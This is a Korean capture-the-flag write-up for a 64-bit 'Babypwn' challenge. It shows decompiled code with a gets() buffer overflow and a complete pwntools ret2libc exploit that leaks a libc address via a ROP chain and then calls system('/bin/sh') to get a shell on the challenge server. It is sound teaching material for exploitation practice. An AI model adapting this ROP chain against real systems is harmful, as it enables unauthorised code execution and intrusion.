Hanctf Babypwn Writeup

LeeDoHyun · April 14, 2020

64bit ROP 문제입니다.

/* Decompiler output of the challenge binary's entry point (argc/argv/envp unused). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-100h]   -- shown as one char, but the frame offset places a 0x100-byte buffer here

  setvbuf(stdout, 0LL, 2, 0LL);                 // unbuffered stdio so prompt/echo are not delayed
  setvbuf(stdin, 0LL, 2, 0LL);
  puts("Give me dataaaaaaaaaaaaa");
  gets(&s, 0LL);                                // buffer overflow: gets() has no length limit, so input past 0x100 bytes
                                                // overwrites saved rbp and the return address (the 0LL is a decompiler
                                                // artifact; gets() takes only the pointer). Fix: fgets(s, sizeof s, stdin)
                                                // with s declared as an explicit array, or any bounded read.
  return puts(&s);                              // echoes the (unterminated-if-overflowed) buffer back to the client
}

코드를 보면 취약점이 바로 보일 정도로 간단한 문제입니다. pop rdi 가젯으로 puts 주소를 leak한 뒤, 거기서 system 함수와 /bin/sh 문자열 주소를 구해서 익스플로잇하면 됩니다.

#!/usr/bin/env python2
#-*-coding:utf8-*-

from pwn import *

#context.log_level = 'debug'
IP = 'pwn.koreahacker.kro.kr'
PORT = '12370'
r = remote(IP, PORT)
#r = process('./challenge')
e = ELF('./challenge')
#libc = e.libc
libc = ELF('libc-2.27.so')  # must be the exact libc build of the target; every offset below depends on it

# Gadget addresses are hard-coded for this specific (non-PIE) binary; a rebuild invalidates them.
ret_gadget = 0x4004c9
pop_rdi_gadget = 0x400703
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = e.symbols['main']

# Stage 1: fill the 0x100-byte buffer plus the 8-byte saved rbp (matches the decompiled
# [rbp-100h] layout), then have the binary print its own puts@got entry and return to main
# so a second input round is possible.
r.recvuntil('Give me dataaaaaaaaaaaaa')
payload = 'A'*(0x100 + 0x8)
payload += p64(pop_rdi_gadget)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendline(payload)

# The printed pointer is 6 significant little-endian bytes; pad to 8 for u64.
# Relies on the leaked address ending in 0x7f (typical userland mapping) -- confirm if it fails.
puts_leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
libc_base = puts_leak - libc.symbols['puts']
system_function = libc_base + libc.symbols['system']
# Python 2 only: .next() and str/bytes concatenation above break on Python 3
# (use next(...) and b'' literals there).
binsh = libc_base + libc.search('/bin/sh').next()

info('puts leak addr : ' + hex(puts_leak))
info('libc base addr : ' + hex(libc_base))
info('system_function addr : ' + hex(system_function))
info('binsh addr : ' + hex(binsh))

# Stage 2: same overflow, now calling system with the libc "/bin/sh" string as rdi.
# NOTE(review): the lone ret before system presumably exists for stack alignment -- confirm.
r.recvuntil('Give me dataaaaaaaaaaaaa')
payload = 'A'*(0x100 + 0x8)
payload += p64(pop_rdi_gadget)
payload += p64(binsh)
payload += p64(ret_gadget)
payload += p64(system_function)
r.sendline(payload)
r.interactive()
